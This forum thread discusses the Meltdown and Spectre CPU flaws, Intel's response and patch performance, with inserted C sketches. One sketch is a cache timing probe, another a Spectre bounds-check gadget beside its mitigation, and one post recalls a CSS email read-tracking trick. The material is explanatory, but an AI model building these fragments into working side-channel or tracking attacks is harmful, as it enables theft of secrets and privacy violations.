
New found CPU bug could seriously downgrade performance for most of us


Azimech


12 minutes ago, PB666 said:

Don't get too excited. The conspiracy part comes in later, after nefarious operators figure out how they can infiltrate your browser and steal your passwords one at a time.

Not to worry, there is always the Raspberry Pi..... for twenty-five bucks you can play with Ubuntu on something like an 80386, which 27 years ago we thought was the greatest thing since sliced bread.... or maybe a used copy of Win 98 . . . . there's always Usenet, NNTP servers, email. 

It doesn't seem to me that it's horribly difficult; if you can program in C, you have access to assembly-language subroutines. The question is what you would extract, because the read-ahead stuff is typically not going to be someone's bank password. The program would have to find a way to get you to do something so that it can steal your password.

Note: all the bug can do is read. It can steal information from your machine, but mostly machine information at that, probably 99.99% of it. 

Like all things, it's pretty easy once it's explained; coming up with the idea, however, requires some skill. 
Found one exploit myself once, more or less at random. This was after images on sites started getting blocked by email clients, because spammers were using the images to verify that the mail had been read.
Found that you could still use external CSS references; even better, something like <link rel="stylesheet" href="http://mysite.com/[email protected]" > worked perfectly. 
This was over 10 years ago and has since been patched, but it was still pretty funny. 


32 minutes ago, Starman4308 said:

That is blatantly misleading. The actual statement:

"Recent reports that these exploits are caused by a “bug” or a “flaw” and are unique to Intel products are incorrect"

They're not saying it's not a problem, they're saying it's not unique to Intel. By chopping off the last half of the statement, you are effectively lying about what they said.

I wanted to stay out of it, but since you mentioned me directly and called me a liar: your emphasis is misleading.

"Recent reports that these exploits are caused by a “bug” or a “flaw” and are unique to Intel products are incorrect"

For those used to logic (and I think people here are ;-)), an "and" joins the two statements into a single one. So, let's formulate this correctly:

"Recent reports that these exploits are caused by a “bug” or a “flaw” or are unique to Intel products are incorrect". That is true.

"Recent reports that these exploits are caused by a “bug” or a “flaw” are incorrect". That is false. (*)

"Recent reports that these exploits are unique to Intel products are incorrect". That is true.

Sorry, m8 ;-)

 

Edit: oh, wait: If you see this as a true statement, then we would have a case of that-what-we-shall-not-mention-here. Think about it. And that is what the article actually states.

Conspiracy, by the way, does not exist as a legal concept in many parts of the world. It is an American thing; legislation in many countries does not recognize it, because it is too soft and too open to manipulation. You have omission or deceit instead, which are much easier to verify.

Edited by Green Baron

Every bit of silicon has bugs in it. They are designed by people, and people sometimes screw up. People were talking about bugs in hardware in the 486 era, and no doubt even before then. Today's chips are much, much more complex and have more potential to conceal serious flaws.


4 hours ago, Green Baron said:

tl;dr: Intel admits that sensitive data can be gathered from a processor that "works as designed". Intel furthermore claims that these are not design flaws. Draw your own conclusions.

Branch prediction is not a design flaw, because it is part of what makes our modern computers so fast. If it couldn't be used, it would cause a major speed loss on modern CPUs, probably much larger, and across more workloads, than the up-to-30% cost of the patches that mitigate Spectre. Unfortunately, I was unable to find just how large the loss would be; however, modern processors are able to predict the correct branch with well over a 90% success rate.
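To make the performance point concrete, here is a minimal C sketch (mine, not from the thread) of the classic demonstration: the same branchy loop runs noticeably faster over sorted data than over random data, because the predictor almost never misses once the branch becomes predictable. The array size, pass count, and timing method are arbitrary choices.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define N (1 << 20)

static int cmp_int(const void *a, const void *b) {
    return (*(const int *)a > *(const int *)b) - (*(const int *)a < *(const int *)b);
}

static double run(const int *data) {
    clock_t start = clock();
    volatile long sum = 0;
    for (int pass = 0; pass < 100; pass++)
        for (int i = 0; i < N; i++)
            if (data[i] >= 128)          /* this branch is what the predictor learns */
                sum += data[i];
    return (double)(clock() - start) / CLOCKS_PER_SEC;
}

int main(void) {
    int *data = malloc(N * sizeof *data);
    if (!data)
        return 1;
    for (int i = 0; i < N; i++)
        data[i] = rand() % 256;

    printf("unsorted: %.2fs\n", run(data));   /* roughly half the branches mispredict */
    qsort(data, N, sizeof *data, cmp_int);
    printf("sorted:   %.2fs\n", run(data));   /* predictor almost never misses */
    free(data);
    return 0;
}

On an out-of-order x86 core the unsorted run is typically several times slower; a processor with no branch prediction at all would pay a large, uniform penalty on every branch, which is the speed loss being described above.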

So Intel's claims can also be interpreted as them only wanting to introduce minor changes to branch prediction in future processors to maintain its speed gain, and instead use mitigation strategies in the OS and software to prevent branch prediction from being exploited. Of course, this means that Spectre will continue to haunt us for a long time, but at least we can keep our fast processors.

Of course, Intel also puts these claims forward to prevent lawsuits and to calm everyone down. Even if they wanted to fix this problem in silicon, this is no new Pentium bug (https://en.wikipedia.org/wiki/Pentium_FDIV_bug), where only small changes were required; it would require us to rethink how our processors work.

Edited by Tullius

5 hours ago, radonek said:

The end of the world. Really. People may be able to bump their CPUs to what the silicon is capable of instead of what they paid for. What a horrible, horrible day.

I don't want to sound overly optimistic, but the agencies surely cracked it long ago; SMM exploits have been known for years, ring -3 access is already known… the bad stuff has already happened, and now we are getting to the good parts (beginning with getting an idea of how bad that bad stuff really is). Of course there is a possibility that a serious "in silicon" security issue will be found, but as we are seeing now, Intel can provide us with this kind of entertainment even without the ME :-)

Not the end of the world, maybe a new dark age. Unless maybe the entity that hacks it happens to be Skynet. 

I don't think there is much the ME does about locking down performance; it might run some control loops for cooling devices (it certainly doesn't need unfettered drive and network access to do that job). Having control over what it does would be nice. But imagine the botnet you could set up on the computers of people who didn't know to kill the ME. I don't like black boxes in my computer. 

Edited by Nuke

10 minutes ago, Tullius said:

Of course, Intel also puts these claims forward to prevent lawsuits and to calm everyone down. Even if they wanted to fix this problem in silicon, this is no new Pentium bug (https://en.wikipedia.org/wiki/Pentium_FDIV_bug), where only small changes were required; it would require us to rethink how our processors work.

Or, in other words (and that is what the sarcastic article states), they talk themselves out of it without taking on too much responsibility, just as little as legally possible. A well-known pattern.

Btw., when I bought my last PC, the faults were already known. The 600 I paid for processor and board could have been spent better.

Second try to take my leave, but if somebody calls me a liar again, I'll be back!

;-)


16 minutes ago, Green Baron said:

Or, in other words (and that is what the sarcastic article states), they talk themselves out of it without taking on too much responsibility, just as little as legally possible. A well-known pattern.

Btw., when I bought my last PC, the faults were already known. The 600 I paid for processor and board could have been spent better.

Second try to take my leave, but if somebody calls me a liar again, I'll be back!

;-)

In the context of Intel's statement about the bug, a single slightly errant half-sentence is enough for you to say "Intel is lying".

While Intel's chips are generally more vulnerable... your $600 would still not have bought a secure CPU from AMD, because everybody was to some extent affected by speculative execution flaws.

Edited by Starman4308

24 minutes ago, Tullius said:

Branch prediction is not a design flaw, because it is part of what makes our modern computers so fast. 

Logical flaw: oversimplification of the problem. 

The problem is not anticipative computing specifically.

Let me give an analogy: when you look at a mirror, you see a reflected image of yourself, but the back of a mirror is its private face, a whole different view of that mirror; in fact, from the back it's not a mirror at all, but a bumpy, non-lustrous coating of metal. In a good mirror design the user never sees the back of the mirror; they only see reflections and framing. 

IOW, they can have speculative branches and chains, but we should not see them or their spurious results. This is, no doubt, a design flaw. It's not a hardware 'bug' in the strictest sense, since the algorithm operates as it should. But in a looser sense, if part of the processor's job is to keep kernel-protected state information 'rationed' from the user, then it is bugged from a security perspective. 
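The way those "spurious results" become visible in practice is through the cache: speculative work is rolled back architecturally, but the cache lines it touched stay warm, and timing reveals which line was loaded. Below is a hedged, self-contained C sketch of just that measurement primitive (flush, touch, then time each slot). The secret value, array layout, and threshold are illustrative assumptions, it assumes x86-64 with the GCC/Clang intrinsics _mm_clflush and __rdtscp, and the "speculative" access is stood in for by an ordinary load.

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp */

static uint8_t probe[256 * 4096];   /* one page-sized slot per possible byte value */
static volatile uint8_t sink;

static uint64_t time_access(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *p;                       /* the load being timed */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    memset(probe, 1, sizeof probe);          /* make sure the pages are mapped */
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * 4096]);       /* evict every slot from the cache */

    /* Stand-in for the transient access: in a real attack this load happens
     * on a mispredicted/unauthorized path, indexed by a secret byte. */
    volatile uint8_t secret = 42;
    sink = probe[secret * 4096];

    /* Whoever can time the slots can recover the byte. */
    for (int i = 0; i < 256; i++) {
        uint64_t t = time_access(&probe[i * 4096]);
        if (t < 120)                         /* cached vs. RAM threshold; machine-dependent */
            printf("slot %d looks cached (%llu cycles)\n", i, (unsigned long long)t);
    }
    return 0;
}

Nothing here breaks any protection by itself; the point is only that cache state survives as a side channel, which is what Meltdown and Spectre use to read out the results of the speculative step.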


30 minutes ago, Starman4308 said:

In the context of Intel's statement about the bug, a single slightly errant half-sentence is enough for you to say "Intel is lying".

While Intel's chips are generally more vulnerable... your $600 would still not have bought a secure CPU from AMD, because everybody was to some extent affected by speculative execution flaws.

There exists an exploit to read out every byte of kernel memory mapped into user space [but restricted to "root"] on Intel processors.  This is called "Meltdown" and is an obviously critical issue.  Try finding a similar exploit that works on AMD processors: they might be vulnerable in theory, but nobody has found a real weakness to exploit.  The bug fixes added to the Linux kernel are Intel-specific, and they aren't concerned with AMD at all (AMD takes steps in hardware to avoid this issue, and even has patents on them, which Intel can use thanks to cross-licensing).

Speculative execution is absolutely necessary on modern machines, but it isn't remotely clear that such bugs will be dangerous.  Expecting a CPU to be free of all theoretical bugs is pretty much impossible, speculative or not: you can build a Turing-complete computer out of the Intel-architecture MMU (so presumably everything since the 386 is affected), but nobody has taken any steps to prevent an attack by that method.

Intel is simply claiming "everybody does it" when clearly only Intel made the huge mistake.

[edit: include link to KSP's source of all scientific and gameplay knowledge:] https://www.youtube.com/watch?v=d7ILCoU9d4k

Edited by wumpus
include youtube link

5 hours ago, Nuke said:

Not the end of the world, maybe a new dark age. Unless maybe the entity that hacks it happens to be Skynet.



Some of you might have heard of AlphaZero ... this AI taught itself chess in four hours, playing chess against itself 44 million times without traditional human input like openings and strategies.

And then it beat the best chess computer the world has ever known, Stockfish: 100 matches, 28 wins, 72 draws.

" This would be akin to a robot being given access to thousands of metal bits and parts, but no knowledge of a combustion engine, then it experiments numerous times with every combination possible until it builds a Ferrari. That's all in less time that it takes to watch the "Lord of the Rings" trilogy. The program had four hours to play itself many, many times, thereby becoming its own teacher. "

Scenario: go ahead you guys/gals, y'all have enough imagination ... that's what I expect from a KSP player visiting this part of the forum.

So I'm not saying this is bad or good. But it could be ... far sooner than we expected.

But I do think that an AI operating from a cloud is something to be avoided ... in case it starts to ask philosophical questions ... I might give my life to pull the plug.

Then again ... where's the popcorn?

 

https://www.chess.com/news/view/google-s-alphazero-destroys-stockfish-in-100-game-match

Edited by Azimech

And the end of the world is canceled, as usual.
https://gizmodo.com/spectre-and-meltdown-fixes-arent-actually-gonna-slow-ev-1821787555

Always assume everything from the media is clickbait, the same way all ads are trying to sell you something.
Note that this is an issue of playing on fear and making everything sound far more serious than it is. 
Also note that this is older than the internet. 


On 01/04/2018 at 4:25 PM, Shadowmage said:

FUD - nothing but FUD.  (fear, uncertainty, doubt)

Actual performance impact for most user-related workloads is ~1%.  Gaming impacts are negligible.  (on either Intel or AMD)

http://www.tomshardware.com/news/meltdown-spectre-exploits-intel-amd-arm-nvidia,36219.html

(now, if you are running a virtualized datacenter, the performance impact is a bit more 'real'.... but then you should get back to work on patching your servers rather than reading this...)

I have an Intel CPU that is chugging along quite happily. How and why would these slowdowns affect it? I have yet to see any noticeable slowdown at all.


2 hours ago, Majorjim! said:

I have an Intel CPU that is chugging along quite happily. How and why would these slowdowns affect it? I have yet to see any noticeable slowdown at all.

For video games that use DirectX, communication with the graphics processor is more direct, so in-game performance should be identical.

For KSP, when you begin to load the game, every time the game picks a file, for example a part config file, it hits the input/output controller. In the old days of computing you could do this yourself directly using interrupt calls; however, with the protected-mode processor features present since the 386, you are pretty much forced to let the OS do it. In fact, the last OS in which you could still peek and poke around the operating system was Windows Millennium. Since Windows NT, and increasingly with XP, you have pretty much delegated all the crucial I/O stuff to the operating system.

The operating system is typically divided into two parts: the touchy-feely stuff everyone is familiar with, and the kernel, which for all intents and purposes is invisible to the user; the kernel is the protected state. IOW, the game goes to the OS's kernel and requests 'stuff', particularly text files. Each time this happens, the OS needs to set up a small interface to the kernel that tells the kernel what it wants; the kernel retrieves it and hands control back to the OS, which has to tear down that interface and then hands control back to the program. So in KSP, if you are like me and have as many modded models as the stock game has, you will probably see a significant slowdown in load times (and I use an SSD). If you make a lot of parts and fine-tune them in the game, you will notice a slowdown when reloading the database. If the game loads a lot of files on the fly, the game will slow down.

Now, if you have one of these new on-mainboard drives that do 10 Gb/s file transfer speeds and you are used to getting your stuff in microseconds, you will probably see an effect sooner than someone using a 'green' drive running on the old 40-pin cables (since those are already slow).
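A rough C sketch of the kind of workload being described (mine, not PB666's; the directory name, file pattern, and count are invented): every open/read/close below is a user-to-kernel round trip, and the Meltdown patches (KPTI) make each of those transitions more expensive, which is why loading thousands of small part files is where any slowdown would show up.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    char path[256], buf[4096];
    clock_t start = clock();
    size_t total = 0;

    for (int i = 0; i < 10000; i++) {                  /* many small files */
        snprintf(path, sizeof path, "GameData/part_%04d.cfg", i);  /* hypothetical layout */
        FILE *f = fopen(path, "rb");                   /* kernel transition: open */
        if (!f)
            continue;
        size_t n;
        while ((n = fread(buf, 1, sizeof buf, f)) > 0) /* kernel transition: read */
            total += n;
        fclose(f);                                     /* kernel transition: close */
    }

    printf("read %zu bytes in %.2fs\n", total,
           (double)(clock() - start) / CLOCKS_PER_SEC);
    return 0;
}

Reading the same data from one big archive would cross into the kernel far fewer times, which is why the later posts by radonek and Starman4308 disagree about how visible this actually is in practice.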


50 minutes ago, PB666 said:

For video games that use DirectX, communication with the graphics processor is more direct, so in-game performance should be identical.

For KSP, when you begin to load the game, every time the game picks a file, for example a part config file, it hits the input/output controller. In the old days of computing you could do this yourself directly using interrupt calls; however, with the protected-mode processor features present since the 386, you are pretty much forced to let the OS do it. In fact, the last OS in which you could still peek and poke around the operating system was Windows Millennium. Since Windows NT, and increasingly with XP, you have pretty much delegated all the crucial I/O stuff to the operating system.

The operating system is typically divided into two parts: the touchy-feely stuff everyone is familiar with, and the kernel, which for all intents and purposes is invisible to the user; the kernel is the protected state. IOW, the game goes to the OS's kernel and requests 'stuff', particularly text files. Each time this happens, the OS needs to set up a small interface to the kernel that tells the kernel what it wants; the kernel retrieves it and hands control back to the OS, which has to tear down that interface and then hands control back to the program. So in KSP, if you are like me and have as many modded models as the stock game has, you will probably see a significant slowdown in load times (and I use an SSD). If you make a lot of parts and fine-tune them in the game, you will notice a slowdown when reloading the database. If the game loads a lot of files on the fly, the game will slow down.

Now, if you have one of these new on-mainboard drives that do 10 Gb/s file transfer speeds and you are used to getting your stuff in microseconds, you will probably see an effect sooner than someone using a 'green' drive running on the old 40-pin cables (since those are already slow).

I appreciate the long answer, but I am still unsure as to how this will affect me. I have an Intel CPU from a few years ago, and I do not update Windows and do not update drivers unless there is a game that has issues, etc. How does this affect me? Will it not affect me unless I download the new Windows 'fix'? Or will it affect me anyway somehow?


33 minutes ago, Majorjim! said:

I appreciate the long answer, but I am still unsure as to how this will affect me. I have an Intel CPU from a few years ago, and I do not update Windows and do not update drivers unless there is a game that has issues, etc. How does this affect me? Will it not affect me unless I download the new Windows 'fix'? Or will it affect me anyway somehow?

You will not observe a slowdown if you do not update.

You will also be vulnerable to Meltdown and Spectre attacks, which are very difficult to detect by classic antivirus techniques, because they run quite like normal programs. And yes, they can basically read any bit of information on your system that they want, including password information.

If you do update, there will be some hit to load times, possibly up to 30%, but once the game is loaded, there should be almost no issue, since the physics and rendering do not involve kernel calls.


6 hours ago, Starman4308 said:

If you do update, there will be some hit to load times, possibly up to 30%…

Nah. It depends on the application and will be hardly visible for desktop users. The 30% figure cited was actually a 5-30% range, and I don't know of any CPU-bound desktop app performing a huge number of context switches. Certainly not any game, browser, or office app.


1 minute ago, radonek said:

Nah. It depends on the application and will be hardly visible for desktop users. The 30% figure cited was actually a 5-30% range, and I don't know of any CPU-bound desktop app performing a huge number of context switches. Certainly not any game, browser, or office app.

Not during active gameplay, but possibly when loading assets there might be an issue.

I'm unsure, actually, whether KSP's loading mechanism does a lot of security context switches; if it loads each file separately, loading time will be worse than if the work mostly stays on the kernel side of each call.


8 hours ago, Majorjim! said:

I appreciate the long answer, but I am still unsure as to how this will affect me. I have an Intel CPU from a few years ago, and I do not update Windows and do not update drivers unless there is a game that has issues, etc. How does this affect me? Will it not affect me unless I download the new Windows 'fix'? Or will it affect me anyway somehow?

If you update, then it is very unlikely you will see any difference. Most experts believe that only database-intensive applications will suffer, because of the huge number of OS calls they make and the way data can be found buffered either in RAM or on external drives. Most other applications (games, word processors, browsers, etc.) will suffer only tiny slowdowns. There was a fear that high-powered servers, such as those used by Google, would suffer badly when updated to be immune to these attacks, but Google now says that their servers are hardly affected by the updates. This makes it look increasingly as if we, the users, will see no problems from updating.


On 1/5/2018 at 9:09 PM, magnemoe said:

And the end of the world is canceled, as usual.
https://gizmodo.com/spectre-and-meltdown-fixes-arent-actually-gonna-slow-ev-1821787555

Always assume everything from the media is clickbait, the same way all ads are trying to sell you something.
Note that this is an issue of playing on fear and making everything sound far more serious than it is. 
Also note that this is older than the internet. 

Use a script blocker, preferably one that doesn't show the image but instead shows the script it's trying to load.

That clickbait is also sometimes malware.


On 1/6/2018 at 5:10 AM, Majorjim! said:

I have an Intel CPU that is chugging along quite happily. How and why would these slowdowns affect it? I have yet to see any noticeable slowdown at all.

They don't, really, which was the point I was trying to make (re: the slowdowns affecting it).  Or rather, they do just as much as on any other desktop, which is to say, not much at all.  Below the threshold of human perception.

This whole thing is getting blown way out of proportion, making national headlines, when really it's just another day in the tech business.  Exploit discovered, exploit getting patched; the patches almost always reduce performance (every single update/patch for Windows usually does), but for some reason this one is a 'big deal'....

It's not (a big deal).


On 1/5/2018 at 9:41 AM, Tullius said:

Branch prediction is not a design flaw, because it is part of what makes our modern computers so fast. If it couldn't be used, it would cause a major speed loss on modern CPUs, probably much larger, and across more workloads, than the up-to-30% cost of the patches that mitigate Spectre. Unfortunately, I was unable to find just how large the loss would be; however, modern processors are able to predict the correct branch with well over a 90% success rate.

The Raspberry Pi uses a processor weak enough not to use branch prediction, and it is not affected at all by this attack.  It gives you a good idea of how weak such a processor would be.

The problem isn't "using speculation is bad", but "allowing the effects of the paths that were incorrectly predicted [and thus should have all their effects rolled back] to leak into the user-visible state".  This comes down to at least two paths:

Allowing the branch predictor to access memory it shouldn't.  It seems Intel [and ARM] "checks their privilege*" a wee bit late and allows operations that have been predicted to use privileged data that they shouldn't to fiddle with branch prediction.  Once this data has been cleared out, the effects of which branch predictions succeeded and failed are still visible.

Allowing the branch predictor to update with data that "shouldn't exist".  Rolling back all speculated operations after mispredicting branches is a real pain, and rolling back the branch prediction updates not only suffers that pain but also loses data (and thus makes branch prediction miss more often).  But it turns out that it may be possible to use the data learned from the mispredictions to determine what happened with data that shouldn't have been accessed.

You should be able to fix these with a limited performance hit.  It will take plenty of engineer-hours to get it done (for Intel and ARM, AMD may have already done most of it).
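For the first of those two paths, the canonical "variant 1" gadget has roughly the shape of the C sketch below (array names and sizes are invented for illustration, not taken from any real code). The vulnerable form lets a mispredicted bounds check speculatively read out of bounds and encode the value into the cache; the masked form clamps the index so that even the speculated path stays in bounds, which is one of the common low-cost software mitigations.

#include <stddef.h>
#include <stdint.h>

#define ARRAY1_SIZE 16
uint8_t array1[ARRAY1_SIZE];
uint8_t array2[256 * 512];     /* probe array whose cache state leaks the value */

/* Vulnerable shape: if the branch is mispredicted with an out-of-bounds x,
 * the CPU may speculatively read array1[x] (potentially a secret) and use it
 * to pull a line of array2 into the cache before the check retires. */
uint8_t victim_leaky(size_t x) {
    if (x < ARRAY1_SIZE)
        return array2[array1[x] * 512];
    return 0;
}

/* Mitigated shape: mask the index so that even on the speculated path the
 * load stays inside array1 (index clamping; compilers and kernels also use
 * fences such as lfence for the same purpose). */
uint8_t victim_masked(size_t x) {
    if (x < ARRAY1_SIZE) {
        size_t safe = x & (ARRAY1_SIZE - 1);   /* works because the size is a power of two */
        return array2[array1[safe] * 512];
    }
    return 0;
}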

A few notes on conspiracy and Intel:

This looks more like a cost-cutting scandal than anything else.  AMD presumably noticed a similar potential flaw, patented a fix, and shipped processors immune to much of this issue.  The catch for Intel (unlike ARM) is that they have a patent cross-licensing deal with AMD and presumably some Intel intern tasked with grepping the list of new patents for "AMD" would have noticed the patent and spread it around to the appropriate engineers.  As far as we know, Intel has only themselves to blame (for at least being not as resistant to this as AMD).

Intel has been known to act in ways that appear indistinguishable from conspiratorial acts.  The hardware RNG in Intel processors has the peculiar property that it appears designed to produce 64-bit random numbers when "correctly" manufactured, but via simple process changes it can be made to produce only 16 bits of true randomness.  This is a problem because it is fundamentally impossible to determine from the output alone just how much "randomness" you have (unless you know the process changes made to produce the chip).  After this was discovered, pretty much all users of random numbers stopped trusting Intel's RDRAND instruction on its own.  Note that it must be far easier to discover vulnerabilities in Windows/iOS/Android/browsers than to bake weird faults into hardware: this is almost certainly a cost-cutting measure (getting privilege escalations is easy, while RDRAND is an amazingly useful target and might actually be a threat).
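For reference, this is roughly how RDRAND is used from C via the compiler intrinsic (a hedged sketch: the XOR "mixing" with a made-up software pool is purely illustrative, and it assumes a GCC/Clang build with -mrdrnd on an x86-64 CPU). The practical upshot of the concern above is exactly this pattern: treat the hardware RNG as one entropy source among several rather than trusting it alone, which is roughly what the Linux kernel does with it.

#include <immintrin.h>   /* _rdrand64_step */
#include <stdint.h>
#include <stdio.h>

int main(void) {
    unsigned long long hw = 0;
    if (!_rdrand64_step(&hw)) {          /* returns 0 if no random value was ready */
        fprintf(stderr, "RDRAND not available or not ready\n");
        return 1;
    }

    /* Stand-in for an independent software entropy pool; real systems would
     * feed everything through a proper CSPRNG instead of a bare XOR. */
    uint64_t sw_pool = 0x9e3779b97f4a7c15ULL;

    uint64_t mixed = hw ^ sw_pool;       /* never rely on the hardware RNG alone */
    printf("hw=%016llx mixed=%016llx\n", hw, (unsigned long long)mixed);
    return 0;
}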

And speaking of conspiracies, the infamous Dual_EC_DRBG random number generator (basically used by the NSA as a backdoor to listen in on anybody foolish enough to use software based on that algorithm) managed to cause a printer driver bug: https://blog.cryptographyengineering.com/2017/12/19/the-strange-story-of-extended-random/

* The user is trying to see root's (the administrator's) code/data.  They aren't supposed to have that privilege, and the "check" should fail.  Sorry about the bad joke.


Having done a lot of reading and YouTube watching to find out more about these exploits, I'm amazed anybody even realised they existed. To use the exploits takes a lot of very real cunning. Similarly, I am not at all surprised these exploits exist. There is no way an engineer could have predicted that these techniques were possible. After all - it took ten years before some bright spark realised the exploit existed. Because of this, I am now firmly signed on to the "[snip] happens" hypothesis in this instance rather than the conspiracy theory or even the "people are dumb" explanation.

Edited by Gargamel
Portions Redacted by Moderator
